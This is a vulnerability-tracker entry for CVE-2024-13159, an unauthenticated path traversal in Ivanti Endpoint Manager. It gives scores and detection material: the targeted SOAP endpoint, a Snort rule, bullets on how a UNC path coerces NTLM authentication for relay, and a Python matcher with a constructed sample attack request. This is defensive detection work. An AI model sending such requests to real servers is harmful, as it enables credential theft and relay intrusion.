CVE-2024-13159
published 2025-01-14


Priority: P1 · 88 · high
CVSS 3.1: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
Tags: KEV, ITW, EXPLOIT
CISA Known Exploited Vulnerability, due 2025-03-31
Exploited in the wild
EPSS: 99.76% (100.0th percentile)
Absolute path traversal in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated attacker to leak sensitive information.

Affected (3 ranges)

Vendor   Product            Version range   Fixed in
ivanti   endpoint_manager   < 2022          2022
ivanti   endpoint_manager
ivanti   endpoint_manager

Detection & IOCs (extracted from sources)

url: /WSVulnerabilityCore/VulCore.asmx
command: POST /WSVulnerabilityCore/VulCore.asmx HTTP/1.1
other: http.favicon.hash:362091310
other: icon_hash="362091310"
bytes: |3c|wildcard|3e 5c 5c 5c 5c|
snort: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Ivanti EPM Absolute Path Traversal (CVE-2024-13159)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/WSVulnerabilityCore/VulCore.asmx"; fast_pattern; http.header; to_lowercase; content:"soapaction|3a 20|"; content:"gethashforwildcardrecursive"; distance:0; http.request_body; content:"|3c|wildcard|3e 5c 5c 5c 5c|"; reference:url,www.horizon3.ai/attack-research/attack-blogs/ivanti-endpoint-manager-multiple-credential-coercion-vulnerabilities/; reference:cve,2024-13159; classtype:web-application-attack; sid:2060232; rev:1; metadata:affected_product Ivanti, attack_target Server, created_at 2025_02_20, cve CVE_2024_13159, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2025_02_20, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Exploit targets the GetHashForWildcardRecursive SOAP endpoint via POST to /WSVulnerabilityCore/VulCore.asmx with a UNC path in the wildcard parameter to coerce NTLM authentication from the EPM server.
  • Detect exploit attempts by matching HTTP POST to /WSVulnerabilityCore/VulCore.asmx with SOAPAction header containing 'gethashforwildcardrecursive' and request body containing the wildcard element with UNC path prefix (\\).
  • Use out-of-band (OOB) DNS interaction detection (e.g., interactsh) to confirm successful NTLM coercion — a DNS callback from the EPM server to an attacker-controlled host indicates exploitation.
  • Proof-of-concept exploits released by Horizon3.ai can be used in relay attacks for unauthenticated coercion of Ivanti EPM machine credentials.
  • The Nuclei template uses a randomized filename variable (rand_text_alpha) and an interactsh callback URL as the UNC target, meaning no static IOC for the UNC path itself is available; detection must rely on the structural pattern of the SOAP request body.
  • The Snort rule (sid:2060232) is scoped to both Perimeter and Internal deployment, reflecting that the attacker requires no authentication and can reach the endpoint from external networks.
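The three matching conditions from the bullets and the Snort rule above, as an added Python example (not code from the page's sources, Emerging Threats or Ivanti): the URI, the SOAPAction marker and the body byte pattern come from sid:2060232, while the SOAP envelope layout, host name and paths in the constructed sample requests are assumptions made only to exercise the matcher.

```python
# Added example: matcher for the three conditions of ET sid:2060232
# (POST to VulCore.asmx, SOAPAction naming GetHashForWildcardRecursive,
# <wildcard> followed by four backslashes).
TARGET_URI = "/WSVulnerabilityCore/VulCore.asmx"
SOAP_ACTION_MARKER = "gethashforwildcardrecursive"
BODY_PATTERN = b"<wildcard>" + b"\\" * 4   # bytes 3c wildcard 3e 5c 5c 5c 5c

def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, uri, headers, body);
    header names are lower-cased, malformed input returns None."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.split(b"\r\n")
    request_line = lines[0].split(b" ")
    if len(request_line) < 2:
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    method, uri = (p.decode("latin-1") for p in request_line[:2])
    return method, uri, headers, body

def is_cve_2024_13159_attempt(raw: bytes) -> bool:
    """True only when all three rule conditions hold, as in the Snort rule."""
    parsed = parse_http_request(raw)
    if parsed is None:
        return False
    method, uri, headers, body = parsed
    if method != "POST" or TARGET_URI not in uri:
        return False
    # Snort applies to_lowercase to the header buffer; match case-insensitively.
    if SOAP_ACTION_MARKER not in headers.get("soapaction", "").lower():
        return False
    return BODY_PATTERN in body

# Constructed sample requests (not real captures); the envelope layout and
# SOAPAction value are assumptions used only to exercise the matcher.
SUSPICIOUS_REQUEST = (
    b"POST /WSVulnerabilityCore/VulCore.asmx HTTP/1.1\r\n"
    b"Host: epm.example.internal\r\n"
    b"SOAPAction: \"GetHashForWildcardRecursive\"\r\n\r\n"
    b"<soap:Body><GetHashForWildcardRecursive><wildcard>"
    b"\\\\\\\\placeholder.invalid\\\\share</wildcard>"
    b"</GetHashForWildcardRecursive></soap:Body>"
)
# Same call with a local path: the UNC-prefix condition fails, so not flagged.
LOCAL_PATH_REQUEST = SUSPICIOUS_REQUEST.replace(
    b"\\\\\\\\placeholder.invalid\\\\share", b"C:\\\\Temp\\\\*.log")
```

As the Nuclei-template bullet notes, the UNC host is attacker-chosen, so the matcher keys on the structural prefix rather than on any host value.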

CVSS provenance

nvd: v3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
vulncheck: 9.8 CRITICAL
cisa: 7.5 HIGH